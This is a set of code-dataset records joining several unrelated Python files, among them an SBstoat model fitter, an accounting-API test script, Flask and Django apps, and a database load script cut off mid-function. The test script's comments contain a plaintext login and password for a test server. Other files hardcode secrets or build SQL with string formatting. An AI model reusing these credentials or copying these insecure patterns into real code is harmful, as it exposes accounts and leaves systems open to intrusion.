      """\r\n        return cls(None, None, None)\r\n\r\n    def rpRevise(self):\r\n        """\r\n        Overrides rpickler.\r\n        """\r\n        if "logger" not in self.__dict__.keys():\r\n            self.logger = Logger()\r\n\r\n    def _validateFittedDataTransformDct(self):\r\n        if self.fittedDataTransformDct is not None:\r\n            keySet = set(self.fittedDataTransformDct.keys())\r\n            selectedColumnsSet = self.selectedColumns\r\n            if (keySet is not None) and (selectedColumnsSet is not None):\r\n                excess = set(keySet).difference(selectedColumnsSet)\r\n                if len(excess) > 0:\r\n                    msg = "Columns not in selectedColumns: %s" % str(excess)\r\n                    raise ValueError(msg)\r\n\r\n    def _transformFittedTS(self, data):\r\n        """\r\n        Updates the fittedTS taking into account required transformations.\r\n\r\n        Parameters\r\n        ----------\r\n        data: np.ndarray\r\n\r\n        Results\r\n        ----------\r\n        NamedTimeseries\r\n        """\r\n        colnames = list(self.selectedColumns)\r\n        colnames.insert(0, TIME)\r\n        fittedTS = NamedTimeseries(array=data[:, :], colnames=colnames)\r\n        if self.fittedDataTransformDct is not None:\r\n            for column, func in self.fittedDataTransformDct.items():\r\n                if func is not None:\r\n                    fittedTS[column] = func(fittedTS)\r\n        return fittedTS\r\n\r\n    @staticmethod\r\n    def _updateParameterDct(parameterDct):\r\n        """\r\n        Handles values that are tuples instead of ParameterSpecification.\r\n        """\r\n        if parameterDct is None:\r\n            parameterDct = {}\r\n        dct = dict(parameterDct)\r\n        for name, value in parameterDct.items():\r\n            if isinstance(value, tuple):\r\n                # tuples use the documented (lower, initial value, upper) order\r\n                dct[name] = ParameterSpecification(lower=value[0],\r\n                        value=value[1], upper=value[2])\r\n        return dct\r\n\r\n    @staticmethod\r\n    def addParameter(parameterDct: dict,\r\n          name: str, lower: float, upper: float, value: float):\r\n        """\r\n        Adds a parameter to a list of parameters.\r\n\r\n        Parameters\r\n        ----------\r\n        parameterDct: parameter dictionary to augment\r\n        name: parameter name\r\n        lower: lower range of parameter value\r\n        upper: upper range of parameter value\r\n        value: initial value\r\n\r\n        Returns\r\n        -------\r\n        dict\r\n        """\r\n        parameterDct[name] = ParameterSpecification(\r\n            lower=lower, upper=upper, value=value)\r\n\r\n    def _adjustNames(self, antimonyModel:str, observedTS:NamedTimeseries) \\\r\n          ->typing.Tuple[NamedTimeseries, list]:\r\n        """\r\n        Antimony exports can change the names of floating species\r\n        by adding a "_" at the end. Check for this and adjust\r\n        the names in observedTS.\r\n\r\n        Return\r\n        ------\r\n        NamedTimeseries: newObservedTS\r\n        list: newSelectedColumns\r\n        """\r\n        rr = te.loada(antimonyModel)\r\n        dataNames = rr.simulate().colnames\r\n        names = ["[%s]" % n for n in observedTS.colnames]\r\n        missingNames = [n[1:-1] for n in set(names).difference(dataNames)]\r\n        newSelectedColumns = list(self.selectedColumns)\r\n        if len(missingNames) > 0:\r\n            newObservedTS = observedTS.copy()\r\n            self.logger.exception("Missing names in antimony export: %s"\r\n                  % str(missingNames))\r\n            for name in observedTS.colnames:\r\n                missingName = "%s_" % name\r\n                if name in missingNames:\r\n                    newObservedTS = newObservedTS.rename(name, missingName)\r\n                    newSelectedColumns.remove(name)\r\n                    newSelectedColumns.append(missingName)\r\n        else:\r\n            newObservedTS = observedTS\r\n        return newObservedTS, newSelectedColumns\r\n\r\n    def copy(self, isKeepLogger=False):\r\n        """\r\n        Creates a copy of the model fitter.\r\n        Preserves the user-specified settings and the results\r\n        of bootstrapping.\r\n        """\r\n        if not isinstance(self.modelSpecification, str):\r\n            try:\r\n                modelSpecification = self.modelSpecification.getAntimony()\r\n            except Exception as err:\r\n                self.logger.error("Problem with conversion to Antimony. 
Details:\",\r\n err)\r\n raise ValueError(\"Cannot proceed.\")\r\n observedTS, selectedColumns = self._adjustNames(\r\n modelSpecification, self.observedTS)\r\n else:\r\n modelSpecification = self.modelSpecification\r\n observedTS = self.observedTS.copy()\r\n selectedColumns = self.selectedColumns\r\n #\r\n if isKeepLogger:\r\n logger = self.logger\r\n elif self.logger is not None:\r\n logger = self.logger.copy()\r\n else:\r\n logger = None\r\n newModelFitter = self.__class__(\r\n copy.deepcopy(modelSpecification),\r\n observedTS,\r\n copy.deepcopy(self.parametersToFit),\r\n selectedColumns=selectedColumns,\r\n fitterMethods=self._fitterMethods,\r\n bootstrapMethods=self._bootstrapMethods,\r\n parameterLowerBound=self.lowerBound,\r\n parameterUpperBound=self.upperBound,\r\n parameterDct=copy.deepcopy(self.parameterDct),\r\n fittedDataTransformDct=copy.deepcopy(self.fittedDataTransformDct),\r\n logger=logger,\r\n isPlot=self._isPlot)\r\n if self.bootstrapResult is not None:\r\n newModelFitter.bootstrapResult = self.bootstrapResult.copy()\r\n newModelFitter.params = newModelFitter.bootstrapResult.params\r\n else:\r\n newModelFitter.bootstrapResult = None\r\n newModelFitter.params = self.params\r\n return newModelFitter\r\n\r\n def initializeRoadRunnerModel(self):\r\n \"\"\"\r\n Sets self.roadrunnerModel.\r\n \"\"\"\r\n self.roadrunnerModel = ModelFitterCore.initializeRoadrunnerModel(\r\n self.modelSpecification)\r\n\r\n def getDefaultParameterValues(self):\r\n \"\"\"\r\n Obtain the original values of parameters.\r\n\r\n Returns\r\n -------\r\n dict:\r\n key: parameter name\r\n value: value of parameter\r\n \"\"\"\r\n dct = {}\r\n self.initializeRoadRunnerModel()\r\n self.roadrunnerModel.reset()\r\n for parameterName in self.parametersToFit:\r\n dct[parameterName] = self.roadrunnerModel.model[parameterName]\r\n return dct\r\n\r\n def simulate(self, params=None, startTime=None, endTime=None, numPoint=None):\r\n \"\"\"\r\n Runs a simulation. 
Defaults to parameter values in the simulation.\r\n\r\n Parameters\r\n ----------\r\n params: lmfit.Parameters\r\n startTime: float\r\n endTime: float\r\n numPoint: int\r\n\r\n Return\r\n ------\r\n NamedTimeseries\r\n \"\"\"\r\n def setValue(default, parameter):\r\n # Sets to default if parameter unspecified\r\n if parameter is None:\r\n return default\r\n return parameter\r\n #\r\n startTime = setValue(self.observedTS.start, startTime)\r\n endTime = setValue(self.observedTS.end, endTime)\r\n numPoint = setValue(len(self.observedTS), numPoint)\r\n #\r\n if self.roadrunnerModel is None:\r\n self.initializeRoadRunnerModel()\r\n #\r\n return ModelFitterCore.runSimulation(parameters=params,\r\n roadrunner=self.roadrunnerModel,\r\n startTime=startTime,\r\n endTime=endTime,\r\n numPoint=numPoint,\r\n selectedColumns=self.selectedColumns,\r\n _logger=self.logger,\r\n _loggerPrefix=self._loggerPrefix,\r\n returnDataFrame=False)\r\n\r\n def updateFittedAndResiduals(self, **kwargs)->np.ndarray:\r\n \"\"\"\r\n Updates values of self.fittedTS and self.residualsTS\r\n based on self.params.\r\n\r\n Parameters\r\n ----------\r\n kwargs: dict\r\n arguments for simulation\r\n\r\n Instance Variables Updated\r\n --------------------------\r\n self.fittedTS\r\n self.residualsTS\r\n\r\n Returns\r\n -------\r\n 1-d ndarray of residuals\r\n \"\"\"\r\n self.fittedTS = self.simulate(**kwargs) # Updates self.fittedTS\r\n residualsArr = self._residuals(self.params)\r\n numRow = len(self.fittedTS)\r\n numCol = len(residualsArr)//numRow\r\n residualsArr = np.reshape(residualsArr, (numRow, numCol))\r\n cols = self.selectedColumns\r\n if self.residualsTS is None:\r\n self.residualsTS = self.observedTS.subsetColumns(cols)\r\n self.residualsTS[cols] = residualsArr\r\n\r\n def _residuals(self, params)->np.ndarray:\r\n \"\"\"\r\n Compute the residuals between objective and experimental data\r\n Handle nan values in observedTS. 
This internal-only method\r\n is implemented to maximize efficieency.\r\n\r\n Parameters\r\n ----------\r\n kwargs: dict\r\n arguments for simulation\r\n\r\n Returns\r\n -------\r\n 1-d ndarray of residuals\r\n \"\"\"\r\n data = ModelFitterCore.runSimulation(parameters=params,\r\n roadrunner=self.roadrunnerModel,\r\n startTime=self.observedTS.start,\r\n endTime=self.observedTS.end,\r\n numPoint=len(self.observedTS),\r\n selectedColumns=self.selectedColumns,\r\n _logger=self.logger,\r\n _loggerPrefix=self._loggerPrefix,\r\n returnDataFrame=False)\r\n if data is None:\r\n residualsArr = np.repeat(LARGE_RESIDUAL, len(self._observedArr))\r\n else:\r\n residualsArr = self._observedArr - data.flatten()\r\n residualsArr = np.nan_to_num(residualsArr)\r\n rssq = sum(residualsArr**2)\r\n if (self._bestParameters.rssq is None) \\\r\n or (rssq < self._bestParameters.rssq):\r\n self._bestParameters = _BestParameters(\r\n params=params.copy(), rssq=rssq)\r\n return residualsArr\r\n\r\n def fitModel(self, params:lmfit.Parameters=None, max_nfev=100):\r\n \"\"\"\r\n Fits the model by adjusting values of parameters based on\r\n differences between simulated and provided values of\r\n floating species.\r\n\r\n Parameters\r\n ----------\r\n params: starting values of parameters\r\n\r\n Example\r\n -------\r\n f.fitModel()\r\n \"\"\"\r\n ParameterDescriptor = collections.namedtuple(\"ParameterDescriptor\",\r\n \"params method rssq kwargs minimizer minimizerResult\")\r\n MAX_NFEV = \"max_nfev\"\r\n block = Logger.join(self._loggerPrefix, \"fitModel\")\r\n guid = self.logger.startBlock(block)\r\n self.initializeRoadRunnerModel()\r\n self.params = None\r\n if self.parametersToFit is not None:\r\n if params is None:\r\n params = self.mkParams()\r\n # Fit the model to the data using one or more methods.\r\n # Choose the result with the lowest residual standard deviation\r\n paramResults = []\r\n lastExcp = None\r\n for idx, optimizerMethod in enumerate(self._fitterMethods):\r\n method = optimizerMethod.method\r\n kwargs = optimizerMethod.kwargs\r\n if MAX_NFEV not in kwargs:\r\n kwargs[MAX_NFEV] = max_nfev\r\n for _ in range(self._numFitRepeat):\r\n self._bestParameters = _BestParameters(params=None, rssq=None)\r\n minimizer = lmfit.Minimizer(self._residuals, params)\r\n try:\r\n minimizerResult = minimizer.minimize(\r\n method=method, **kwargs)\r\n except Exception as excp:\r\n lastExcp = excp\r\n msg = \"Error minimizing for method: %s\" % method\r\n self.logger.error(msg, excp)\r\n continue\r\n params = self._bestParameters.params.copy()\r\n rssq = np.sum(self._residuals(params)**2)\r\n if len(paramResults) > idx:\r\n if rssq >= paramResults[idx].rssq:\r\n continue\r\n parameterDescriptor = ParameterDescriptor(\r\n params=params,\r\n method=method,\r\n rssq=rssq,\r\n kwargs=dict(kwargs),\r\n minimizer=minimizer,\r\n minimizerResult=minimizerResult,\r\n )\r\n paramResults.append(parameterDescriptor)\r\n if len(paramResults) == 0:\r\n msg = \"*** Minimizer failed for this model and data.\"\r\n self.logger.error(msg, lastExcp)\r\n else:\r\n # Select the result that has the smallest residuals\r\n sortedMethods = sorted(paramResults, key=lambda r: r.rssq)\r\n bestMethod = sortedMethods[0]\r\n self.params = bestMethod.params\r\n self.minimizer= bestMethod.minimizer\r\n self.minimizerResult = bestMethod.minimizerResult\r\n # Ensure that residualsTS and fittedTS match the parameters\r\n self.updateFittedAndResiduals(params=self.params)\r\n self.logger.endBlock(guid)\r\n\r\n def getFittedModel(self):\r\n \"\"\"\r\n 
Provides the roadrunner model with fitted parameters\r\n\r\n Returns\r\n -------\r\n ExtendedRoadrunner\r\n \"\"\"\r\n self._checkFit()\r\n self.roadrunnerModel.reset()\r\n self._setupModel(self.params)\r\n return self.roadrunnerModel\r\n\r\n def _setupModel(self, parameters):\r\n \"\"\"\r\n Sets up the model for use based on the parameter parameters\r\n\r\n Parameters\r\n ----------\r\n parameters: lmfit.Parameters\r\n\r\n \"\"\"\r\n ModelFitterCore.setupModel(self.roadrunnerModel, parameters, logger=self.logger)\r\n\r\n def mkParams(self, parameterDct:dict=None)->lmfit.Parameters:\r\n \"\"\"\r\n Constructs lmfit parameters based on specifications.\r\n\r\n Parameters\r\n ----------\r\n parameterDct: key=name, value=ParameterSpecification\r\n\r\n Returns\r\n -------\r\n lmfit.Parameters\r\n \"\"\"\r\n if parameterDct is None:\r\n parameterDct = self.parameterDct\r\n return ModelFitterCore.mkParameters(parameterDct,\r\n parametersToFit=self.parametersToFit,\r\n logger=self.logger,\r\n lowerBound=self.lowerBound,\r\n upperBound=self.upperBound)\r\n\r\n def _checkFit(self):\r\n if self.params is None:\r\n raise ValueError(\"Must use fitModel before using this method.\")\r\n\r\n def serialize(self, path):\r\n \"\"\"\r\n Serialize the model to a path.\r\n\r\n Parameters\r\n ----------\r\n path: str\r\n File path\r\n \"\"\"\r\n newModelFitter = self.copy()\r\n with open(path, \"wb\") as fd:\r\n rpickle.dump(newModelFitter, fd)\r\n\r\n @classmethod\r\n def deserialize(cls, path):\r\n \"\"\"\r\n Deserialize the model from a path.\r\n\r\n Parameters\r\n ----------\r\n path: str\r\n File path\r\n\r\n Return\r\n ------\r\n ModelFitter\r\n Model is initialized.\r\n \"\"\"\r\n with open(path, \"rb\") as fd:\r\n fitter = rpickle.load(fd)\r\n fitter.initializeRoadRunnerModel()\r\n return fitter\r\n","sub_path":"SBstoat/_modelFitterCore.py","file_name":"_modelFitterCore.py","file_ext":"py","file_size_in_byte":30864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"247373980","text":"import configparser\nimport re\nfrom base.adminka import create_user_session, wait_periodictask_to_be_done2\nimport paramiko\nimport time\nimport datetime\n\nconfig = configparser.ConfigParser()\nconfig.read(\"cred/config.ini\")\n#\n# host = config['server']['host']\n# port = int(config['server']['port'])\n# user = config['server']['username']\n# password = config['server']['password']\n# \"\"\"----------------------upload excel file---------------------------\"\"\"\n# transport = paramiko.Transport((host, port))\n# transport.connect(username=user, password=password)\n# sftp = paramiko.SFTPClient.from_transport(transport)\n#\n#\n# remotepath = f'/home/alex_zatushevkiy/month_import/accounts.xlsx'\n# localpath = f'C:/Users/wsu/Desktop/accounts.xlsx'\n# sftp.put(localpath, remotepath)\n#\n# sftp.close()\n# transport.close()\n# time.sleep(10)\n#\n# \"\"\"---------------------run script on server-------------------\"\"\"\n# client = paramiko.SSHClient()\n# client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n# client.connect(hostname=host, username=user, password=password, port=port)\n#\n# stdin, stdout, stderr = client.exec_command('cd /smartteam/msw_server_9999/msw && '\n# 'python3 manage.py shell < /home/alex_zatushevkiy/10/cleaner_super.py && '\n# 'python3 manage.py shell < /home/alex_zatushevkiy/month_import/poo.py')\n# client.close()\n# time.sleep(15)\n\"\"\"------------------------------run month import---------------------------------\"\"\"\n# session = 
create_user_session(config['host']['host_9999'], **config['super_user_9999'])\n#\n# for i in range(1):\n# url = f'https://mytest-server.sg.com.ua:9999/api/accounting_system/full_prop_data/' \\\n# f'?date_from=2021-06-25&file_format=xlsx'\n#\n# a = time.time()\n# get = session.get(url)\n# print(get.status_code)\n# print(time.time() - a)\n# # print(get.text)\n# # print(len(get.json()))\n# with open(f'./as45_report.xlsx', 'wb') as file:\n# file.write(get.content)\n# print(time.time() - a)\n\n# csrfmiddlewaretoken = re.findall('name=\"csrfmiddlewaretoken\" value=\"(.+)\">', get.text)[0]\n#\n# recon_dict = {\n# 'csrfmiddlewaretoken' : csrfmiddlewaretoken,\n# 'action': 'run_tasks',\n# 'select_across': '0',\n# 'index': '0',\n# '_selected_action': '86',\n# }\n# print(datetime.datetime.now())\n# session.post(url, data=recon_dict, headers={\"Referer\": url})\n# print(datetime.datetime.now())\n# asd = config[\"pg_db_9999\"]\n#\n# print(wait_periodictask_to_be_done2('import_from_propreports_monthly', asd))\n# print(datetime.datetime.now())\n#\n# print(wait_periodictask_to_be_done2('entries_for_prop_month_correction', asd))\n# print(datetime.datetime.now())\n\n\n\nfrom base.main_functions import get_token\nsession = create_user_session(config['host']['host_9999'], **config['super_user_9999'])\nprint(session.cookies)\n# response = session.get('https://mytest-server.sg.com.ua:9999/api/accounting_system/account_type/')\n# print(response.text)\n\nwhile True:\n print('question')\n asd = input()\n if asd == 'exit':\n break\n elif asd == 'yes':\n response = session.get('https://mytest-server.sg.com.ua:9999/api/accounting_system/account_type/', headers={'Refresh-Session': ''})\n print(response.status_code)\n print(response.cookies)\n else:\n response = session.get('https://mytest-server.sg.com.ua:9999/api/accounting_system/account_type/')\n print(response.status_code)\n print(response.cookies)\n# for i in range(3):\n# url = 'https://mytest-server.sg.com.ua:9999/api/accounting_system/entry/'\n# request = {\n# 'transaction_out.user_bill': '142015',\n# 'transaction_out.company_bill': '',\n# 'transaction_in.user_bill': '',\n# 'transaction_in.company_bill': '120',\n# 'entry.date_to_execute': '2021-08-10T00:00:00',\n# 'entry.description': 'autotest',\n# 'transaction_common.amount_usd': '9',\n# 'transaction_common.description': 'autotest',\n# 'csrfmiddlewaretoken': get_token(session, url),\n# }\n# response = session.post(url, data=request, headers={\"Referer\": url})\n# print(response.text)\n# entry = response.json()['entry']\n# time.sleep(0.1)\n# url = f'https://mytest-server.sg.com.ua:9999/api/accounting_system/entry/cancel/{entry}/'\n# response = session.get(url)\n# print(response.text)\n\n# import requests\n#\n#\n# url = 'https://mytest-server.sg.com.ua:9999/api/token/'\n# session = requests.Session()\n#\n# request_dict = {\n# 'username': 'Admin_Zatush',\n# 'password': '1423qrwe',\n# }\n# response = session.post(url, data=request_dict)\n# tokens = response.json()\n# access = tokens['access']\n# print('access token: ', access)\n#\n#\n#\n# url = 'https://mytest-server.sg.com.ua:9999/api/accounting_system/app/full_prop_data/'\n#\n# token2 = get_token(session, url, key ='X-CSRFToken')\n#\n# url = 'https://mytest-server.sg.com.ua:9999/api/accounting_system/app/full_prop_data/'\n# resp = session.get(url, headers={\"Authorization\": f'Token {access}'})\n# # print(resp.request.headers)\n# print(resp.status_code)\n# print(resp.text)\n\n# url = \"https://test.pinesoftware.com.cy:9443/contacts/\"\n# session = 
requests.Session()\n# token = get_token(session, url)\n# body = {\n#     'csrfmiddlewaretoken': token,\n#     'first_name': 'asdasdsdg',\n#     'last_name': 'fjfgj',\n#     'email': 'asd@gmail.com',\n#     'telephone': '+56784938456',\n#     'text': 'asdgasdgasdg',\n#     'contacts': '',\n#     'file': '',\n# }\n# response = session.post(url, data=body, headers={"Referer": url})\n#\n# print(response.text)\n# print(response.status_code)\n#\n#\n#\n\n\n\n\n\n","sub_path":"test_month_import.py","file_name":"test_month_import.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"616444735","text":"import sqlite3\nimport os\nfrom flask import Flask, request, g, redirect, url_for, render_template, session\nfrom threading import Lock\nfrom flask_socketio import SocketIO, emit, join_room, leave_room, \\\n    close_room, rooms, disconnect\nfrom crypto_api import get_info\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'my key'\n\n# ======== crypto part =======\n# async_mode = None\nsocketio = SocketIO(app, async_mode=None)\nthread = None\nthread_lock = Lock()\n\n@socketio.on('my_event')\ndef test_message():\n    emit('price_responce', get_info())\n\n\n@app.route('/pavel/crypto')\ndef index():\n    return render_template('price.html', async_mode=socketio.async_mode)\n\n\ndef background_thread():\n    """Example of how to send server generated events to clients."""\n    while True:\n        socketio.sleep(5)\n        socketio.emit('price_responce', get_info())\n\n@socketio.on('connect')\ndef test_connect():\n    emit('price_responce', get_info())\n    global thread\n    with thread_lock:\n        if thread is None:\n            thread = socketio.start_background_task(target=background_thread)\n\n# ====== notes part ======\n\ndef connect_db():\n    rv = sqlite3.connect('notes.db')\n    return rv\n\ndef get_db():\n    # If there is no database connection yet, open a new one for\n    # the current application context\n    if not hasattr(g, 'sqlite_db'):\n        g.sqlite_db = connect_db()\n    return g.sqlite_db\n\n\n@app.teardown_appcontext\ndef close_db(error):\n    # Close the database when the connection is torn down\n    if hasattr(g, 'sqlite_db'):\n        g.sqlite_db.close()\n\n\n@app.route('/pavel/notes')\ndef show_all_posts():\n    db = get_db()\n    cur = db.execute('select * from notes')\n    articles = cur.fetchall()\n    return render_template('post_list.html', articles=articles)\n\n\n@app.route('/pavel/notes/post/<post_id>')\ndef single_post(post_id):\n    db = get_db()\n    cur = db.execute('select * from notes where id=?', [(post_id)])\n    article = cur.fetchall()\n    return render_template('post_detail.html', article=article[0])\n\n\n@app.route('/pavel/notes/create')\ndef create_post():\n    return render_template('create_post.html')\n\n\n@app.route('/pavel/notes/add', methods=['POST'])\ndef add_entry():\n    db = get_db()\n    db.execute('insert into notes(author, post) values (?, ?)',\n               [request.form['author'], request.form['text']])\n    db.commit()\n    return redirect(url_for('show_all_posts'))\n\n\n@app.route('/pavel/notes/delete/<post_id>')\ndef delete(post_id):\n    db = get_db()\n    db.execute('delete from notes where id=?', [(post_id)])\n    db.commit()\n    return redirect(url_for('show_all_posts'))\n\n\n@app.route('/pavel/notes/rewrite/<post_id>')\ndef rewrite(post_id):\n    db = get_db()\n    cur = db.execute('select * from notes where id=?', [(post_id)])\n    article = cur.fetchall()\n    return render_template('rewrite_post.html', article=article[0])\n\n\n@app.route('/pavel/notes/add_old/<post_id>', methods=['POST'])\ndef add_old(post_id):\n    db = get_db()\n    db.execute('update notes set author=?, post=? where id=?',\n               [request.form['author'], request.form['text'], post_id])\n    db.commit()\n    return redirect(url_for('show_all_posts'))\n\n# ===== standard part ========\n@app.route('/pavel/home')\ndef show_home():\n    return render_template('home.html')\n\n@app.route('/pavel/info')\ndef show_info():\n    return render_template('info.html')\n\n@app.route('/pavel/photos')\ndef show_photo():\n    return render_template('photos.html')\n\n@app.route('/pavel/dynamic')\ndef show_dynamic():\n    return render_template('dynamic.html')\n\n@app.route('/pavel/banners')\ndef show_banners():\n    return render_template('banners.html')\n\n@app.route('/pavel/search')\ndef show_search():\n    return render_template('search.html')\n\n\nif __name__ == '__main__':\n    app.run(host='localhost', port=5002)\n","sub_path":"Холкин/Исходники/forum/support/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"20731215","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http.response import HttpResponse, Http404\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom django.shortcuts import render_to_response, redirect\nfrom article.models import Article, Comments\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom forms import CommentForm\nfrom django.core.context_processors import csrf\nfrom django.contrib import auth\nfrom django.core.paginator import Paginator\nfrom OERPConnector import OERP\n\n\ndef basic_one(request): # don't do it this way!\n    view = "basic_one"\n    html = "This is %s view" % view\n    return HttpResponse(html)\n\n\ndef template_two(request):\n    view = "template_two" # a variable\n    t = get_template('myview.html') # load the template\n    html = t.render(Context({'name': view})) # passed into the template\n    return HttpResponse(html)\n\n\ndef template_three_simple(request):\n    view = "template three"\n    return render_to_response('myview.html', {'name': view}) # sent to the template\n\n\ndef articles(request, page_number=1): # request - the browser request\n    all_articles = Article.objects.all() # returns all created articles\n    current_page = Paginator(all_articles, 2) # 2 articles per page\n    return render_to_response('articles.html', {'articles': current_page.page(page_number),\n                                                'username': request.session['name'],\n                                                'photo': request.session['image']}) # user id\n\n\ndef article(request, article_id, comm_page=1): # request - the browser request, article_id - the article id,\n    # returns the given article and the comments for it\n    comment_form = CommentForm\n    args = {} # dict passed into the template\n    args.update(csrf(request))\n    comments = Comments.objects.filter(comments_article_id=article_id) # filter - returns several values\n    # (the comments for the given article)\n    args['article'] = Article.objects.get(id=article_id) # get - returns a single value matching the criterion\n    args['form'] = comment_form\n    args['username'] = auth.get_user(request).username # the user\n    args['comments'] = Paginator(comments, 2).page(comm_page) # first page of comments by default\n    return render_to_response('article.html', args)\n\n\ndef addlike(request, article_id, page): # request - the browser request, article_id - the article id\n    try:\n        if article_id in request.COOKIES:\n            return redirect('/')\n        else:\n            article = Article.objects.get(id=article_id)\n            article.article_likes += 1\n            article.save()\n            response = redirect('/page/%s/' % page)\n            response.set_cookie(article_id, 'test')\n            return response\n    except ObjectDoesNotExist:\n        raise Http404\n    return redirect('/page/%s/' % page)\n\n\ndef addcomment(request, article_id, comm_page):\n    if request.POST and ('pause' not in request.session): # if data came as a POST request and there is no active session\n        form = CommentForm(request.POST) # create a CommentForm instance (the comment form)\n        if form.is_valid(): # validate the submitted data\n            comment = form.save(commit=False) # prevent automatic saving of the form\n            comment.comments_article = Article.objects.get(id=article_id) # assign the article id\n            form.save() # save\n            request.session.set_expiry(60) # 60-second session\n            request.session['pause'] = True\n        return redirect('/articles/get/%s/%s/' % (article_id, comm_page)) # redirect to the article\n\n","sub_path":"article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"214461728","text":"from gym_sokoban.envs.sokoban_env import SokobanEnv\nfrom gym_sokoban.envs.render_utils import room_to_rgb\nimport numpy as np\n\nclass BoxobanEnv(SokobanEnv):\n    num_boxes = 4\n    dim_room=(10, 10)\n\n    def __init__(self,\n             max_steps=120,\n             difficulty='unfiltered', split='train'):\n        self.difficulty = difficulty\n        self.split = split\n        self.verbose = False\n        super(BoxobanEnv, self).__init__(self.dim_room, max_steps, self.num_boxes, None, False)\n    \n\n    def reset(self, room, topology):\n        room[room == 3] = 4\n        self.player_position = np.argwhere(room == 5)[0]\n        self.room_fixed, self.room_state, self.box_mapping = topology, room, {}\n\n        self.num_env_steps = 0\n        self.reward_last = 0\n        self.boxes_on_target = 0\n\n        starting_observation = room_to_rgb(self.room_state, self.room_fixed)\n\n        return starting_observation","sub_path":"meta/tests/boxoban_env.py","file_name":"boxoban_env.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"113429410","text":"\nimport psycopg2\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef Create_alag(item_nafn):\n\n\t#----------------------------------------------------------------------------\n\t#Connection to SQL\n\t#----------------------------------------------------------------------------\n\thost = 'localhost'\n\tdbname = 'atvr2'\n\tusername = 'postgres'\n\tpw = 'postgres'\n\n\tconn_string = "host='{}' dbname='{}' user='{}' password='{}'"\n\n\ttry:\n\t\tconn = psycopg2.connect(conn_string.format(host, dbname, username, pw))\n\texcept psycopg2.OperationalError as e:\n\t\tprint('Connection failed')\n\t\tprint('Error: ', e)\n\t\texit()\n\tcursor = conn.cursor()\n\n\n\t#----------------------------------------------------------------------------\n\t# Write the select Q & OPEN\n\t#----------------------------------------------------------------------------\n\n\tselectstring = " select s.SourceNo,c.tegund, vi.Document_ID1, vi.UserID, vi.Quantity, vi.Qty_perUnit, vi.picked, vi.Picked_Unit, vi.Date_Scanned,s.RE_number, s.Shelf, i.Vendor, i.Description, i.id,i.MilliL from vinnsla vi, sending s, item i, Item_Category c where vi.itemno = i.id and i.id = {} and s.ItemNo = i.id and s.RE_number = vi.Document_ID1 and c.name = i.Tegund and vi.Date_Scanned like ('%2018') order by (vi.Date_Scanned, vi.Picked)".format(item_nafn)\n\n\tcursor.execute(selectstring)\n\tarr = cursor.fetchall()\n\n\tselectstring2 = "select 
inn.sending, c.tegund, vi.Document_ID1, vi.UserID, vi.Quantity, vi.Qty_perUnit, vi.picked, vi.Picked_Unit, vi.Date_Scanned, i.Vendor, i.Description, i.id from vinnsla vi, Innstreymi inn, item i, Item_Category c where vi.itemno = i.id and inn.ItemNo = i.id and i.id = {} and inn.put = vi.Document_ID1 and c.name = i.Tegund and vi.Date_Scanned like ('%2018') order by (vi.Date_Scanned, vi.Picked)\".format(item_nafn)\n\tcursor.execute(selectstring2)\n\trecord = cursor.fetchall()\n\n\t#----------------------------------------------------------------------------\n\t# Dictornary lykill count, frá 2 select skipunum\n\t#----------------------------------------------------------------------------\n\n\tLagerbjor_arr = []\n\tLagerbjor_record = []\n\tLagerbjor_dict = {}\n\talag_per_sendingu_min = 0\n\n\tinn_i_kerfi = 0\n\tupp_i_hillu = 0\n\n\tcounter = 0\n\tcurrcount= 0\n\n\t#item_nafn = 23956\n\tfor x in arr:\n\t\tif x[13] == item_nafn:\n\t\t\tcounter = counter + 1\n\n\t\t\tfor i in record:\n\t\t\t\t#SendingarID & Item_no (Item) & Quantity\n\t\t\t\tif x[0] == i[0] and i[11] == x[13] and i[4] == x[4] and x[8] == i[8]:\n\t\t\t\t\tif item_nafn == i[11]:\n\t\t\t\t\t\tinn_i_kerfi = (int(x[6][0:2])*60 + int(x[6][3:5]))\n\t\t\t\t\t\tupp_i_hillu = (int(i[6][0:2])*60 + int(i[6][3:5]))\n\t\t\t\t\t\t\n\t\t\t\t\t\talag_per_sendingu_min = (upp_i_hillu - inn_i_kerfi)\n\t\t\t\t\t\tif alag_per_sendingu_min < 300 and alag_per_sendingu_min > 0:\n\t\t\t\t\t\t\tLagerbjor_dict[currcount] = [x[0],x[1],'Sending:',x[6],x[8],'Innstreymi:',i[6],i[8], 'Description:',i[11] ,i[10],x[12],'Álag i min :', alag_per_sendingu_min, 'Quantity of packs',x[4], 'Liters:', x[14], 'QTY_per_unit', x[5]]\n\t\t\t\t\t\t\t#print(Lagerbjor_dict[currcount])\n\t\t\t\t\t\t\tcurrcount = currcount + 1\n\t#print('Currcount ',currcount)\n\t#for i in Lagerbjor_dict:\n\t\t#print('{}, {}'.format(i, Lagerbjor_dict[i]))\n\n\n\t#----------------------------------------------------------------------------\n\t# Look at alag by finding a average\n\t#----------------------------------------------------------------------------\n\n\tlagerbjor_alag_total = 0\n\tlagerbjor_count = 0\n\tlagerbjor_packs_total = 0\n\tlagerbjor_Liter_total = 0\n\tfor i in range(0,len(Lagerbjor_dict)):\n\t\tlagerbjor_alag_total = (lagerbjor_alag_total + Lagerbjor_dict[i][13])\n\t\tlagerbjor_count = lagerbjor_count + 1\n\t\tlagerbjor_packs_total = (lagerbjor_packs_total + Lagerbjor_dict[i][15])\n\t\tlagerbjor_Liter_total = lagerbjor_Liter_total + (float(Lagerbjor_dict[i][17])/1000)*Lagerbjor_dict[i][15]*Lagerbjor_dict[i][19]\n\n\n\t#-----------------------\n\t# 